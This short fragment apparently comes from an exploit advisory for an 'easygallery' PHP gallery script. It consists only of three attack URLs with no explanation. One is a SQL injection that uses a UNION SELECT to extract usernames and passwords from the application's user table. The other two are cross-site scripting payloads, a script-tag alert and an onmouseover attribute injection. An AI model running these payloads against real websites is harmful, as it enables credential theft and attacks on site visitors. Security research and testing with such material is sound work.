http://www.example.com/PATH/staticpages/easygallery/index.php?page=category&PageSection=0&catid=-1+union+all+select+1,2,3,concat(puUsername,char(54),puPassword),5,6,7,8,9,0,1+from+edp_puusers/* http://www.example.com/PATH/staticpages/easygallery/index.php/"><ScRiPt>alert("JosS)</ScRiPt> http://www.example.com/PATH/staticpages/easygallery/index.php?help=about&q=%22+onmouseover=alert("JosS")